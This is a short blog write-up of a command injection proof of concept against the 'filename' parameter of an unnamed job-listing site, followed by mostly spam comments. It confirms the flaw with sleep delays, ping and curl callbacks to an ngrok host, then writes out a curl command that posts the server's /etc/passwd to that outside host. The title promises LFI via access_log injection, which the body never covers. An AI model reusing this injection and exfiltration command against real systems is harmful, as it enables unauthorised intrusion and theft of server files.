LFI to RCE via access_log injection

Command Injection PoC

So back in December 2017 i found a command injection vulnerability in one of job listing site. Here is the simple proof of concept. The vulnerable parameter is filename.

I do test with this command `sleep 5` and the response is delayed for 5–6 seconds (6.113 millis). See the delay in right corner below.

 

I double check again with `sleep 10` just to make sure and got to see the difference. And again response is delayed for 10–11 seconds (11.137 millis). See the delay in right corner below.

  

I try ping to my server using `ping -c 5 ` and run tcpdump -i -n icmp on my server to see incoming ICMP packets. That ping command means send 5 times ICMP packets to my server IP address.

  

 
 
Sorry for the redacted but you can see i have incoming ICMP packets for 5 times. My server IP address is 5.000.000.105 and the incoming ICMP packets is from 000.000.39.169. Now i know the filename parameter is vulnerable to command injection.

I’m doing another test using ngrok. So i run ./ngrok http 80 on my localhost and i execute this `curl blablabla.ngrok.io` on the vulnerable parameter.

 

Now see the response on ngrok web interface (http://127.0.0.1:4040). I got incoming request from IP address 000.000.39.169. The same IP address in ICMP request above.

 

Now i can read files on the vulnerable server and send it to my ngrok address using this command `curl -F shl=@/etc/passwd blablabla.ngrok.io`. That command means send POST request to blablabla.ngrok.io with shl parameter that contains /etc/passwd in it.

 

And the result is vulnerable server send me their /etc/passwd to my ngrok address. Again from IP address 000.000.39.169.

 

Thats it! Happy hacking! :)

Comments

How is this an attack against the web architecture as opposed to an exploit to how unix systems execute commands in shells? I'm currently in a security course and my professor explains the command injection attack as an OS exploit. Good video though.


Smartsurveys4u said…

I could not resist commenting. Perfectly written!

FMCDealer
TellSubway
DQFanSurvey
Raj Maan said…
we were able to satisfy all the customers who contracted with the company and contacted them, because we specialize in cleaning, sewerage and transport of luggage just contact us and you will notice that your house as if it is completely new from the intensity of cleanliness. 123movies
Nice Post...
Can anyone help in HP printer troubleshooting?
While printing, users usually encounter errors or printing issues which require HP printer troubleshooting. Get instant help from the HP customer support team and get your printer issues fixed in a few seconds. The experts identify the root cause of the problem and then help you in rectifying the issue with the best possible solution. They do not use hit and try methods to fix the printer. They have an eye to find the issues immediately and fix them. If you are a pro, try finding the root cause of the issue or simply restart your printer after switching it off and then restart it after 15-20 seconds. This might resolve your issue temporarily.
andre rushell said…
You might have an internet connectivity issue that can cause error while opting for forgot Facebook password option. Therefore, to deal with such an issue you can navigate to customer care where you can put forward your query to the tech support team or you can also navigate to the tech consultancies that can help you with the error that you’re facing.
Essien said…
Its a worth effort post; your kind of post will be an help to many; from the debt of my heart I've fancy this auspicious updates; its such a helpful one; I've enjoyed surfing through. Once more thanks for sharing. Also visit fedcodtten post form out
james said…
This website "command injection" vulnerability in one of job listing site. Here is the simple proof of concept. Now its time to avail solar panels for homefor more details.